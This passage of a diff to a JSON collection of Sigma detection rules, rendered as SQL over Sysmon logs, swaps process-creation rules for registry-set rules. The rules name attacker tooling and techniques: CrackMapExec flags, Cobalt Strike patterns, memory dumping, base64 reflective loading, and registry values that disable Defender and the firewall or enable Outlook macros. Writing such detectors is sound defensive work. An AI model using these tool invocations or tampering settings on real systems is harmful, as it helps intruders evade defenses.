'%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "status": "experimental", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Administrative scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" - }, - { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" - }, - { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Copy From VolumeShadowCopy Via 